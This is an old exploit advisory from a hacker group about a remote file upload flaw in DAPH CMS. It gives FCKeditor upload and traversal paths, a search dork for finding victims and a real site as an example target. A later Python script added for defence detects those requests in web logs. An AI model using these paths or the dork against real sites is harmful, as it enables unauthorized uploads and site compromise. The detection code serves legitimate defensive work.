DAPH CMS Remote File Upload (RFU) Vulnerability

2012.02.06
Credit: Nitrojen90
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: DAPH CMS Remote File Upload (RFU) Vulnerability
# Date: 2012-02-04 [GMT +7]
# Author: BHG Security Center
# Discovered : Nitrojen90
# Software Link: http://www.daph.gov.lk/
# Dork: inurl:Animal Production and Health (DAPH)
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
DAPH CMS Remote File Upload (RFU) Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-02-04
Location : Iran-Tehran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
-----------------------------------------------------------------------------------------
Remote File Upload (RFU)

## Go to the target and append /fckeditor/editor/filemanager/connectors/uploadtest.html to www.site.com/admin .

P0C :
1- /admin/fckeditor/editor/filemanager/connectors/uploadtest.html
2- /admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../&Connector=connectors/php/connector.php

Example :
1- http://nxsdbp.org.kh/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
-----------------------------------------------------------------------------------------
@@@ Special Thanks to : Net.Edit0r | A.Cr0x | 3H34N | 4m!n | ArYaIeIrAn | G3n3Rall | NoL1m1t | Mr.XHat | Bl4ck.Viper @@@
$$$ My Good Friends : Hellboy - Cyrus(fr0nk) - md.r00t $$$

References:

http://www.daph.gov.lk/
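
Detection sketch for the two request patterns listed in the P0C, added here as an example and not part of the original advisory. It assumes Apache/nginx combined-format access logs; the sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2012:10:01:12 +0700] "GET /admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Feb/2012:10:01:40 +0700] "GET /admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=..%2F..%2F&Connector=connectors/php/connector.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Feb/2012:10:02:03 +0700] "GET /admin/FCKeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 310 "-" "curl/7.21"
192.0.2.15 - - [04/Feb/2012:10:03:00 +0700] "GET /index.php?Type=news HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
FILEMANAGER = "/fckeditor/editor/filemanager/"

def classify(target):
    """Return a finding name for a request target, or None if it is unrelated."""
    parts = urlsplit(target)
    # Decode and lowercase so %-encoding and case variants of the path still match.
    path = unquote(parts.path).lower()
    if FILEMANAGER not in path:
        return None
    if path.endswith("/connectors/uploadtest.html"):
        return "upload-test-page"
    # parse_qs percent-decodes values, so ..%2F is caught as well as ../
    types = parse_qs(parts.query).get("Type", [])
    if any(".." in t for t in types):
        return "type-traversal"
    return None

def scan(log_text):
    """Return (ip, finding, status, served) tuples for matching requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _method, target, status = m.groups()
        kind = classify(target)
        if kind:
            # 200 means the file was actually served; 404 is a probe that missed.
            findings.append((ip, kind, int(status), status == "200"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with `served` set to True means the FCKeditor test page or file browser is reachable on that host and should be removed or placed behind authentication.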

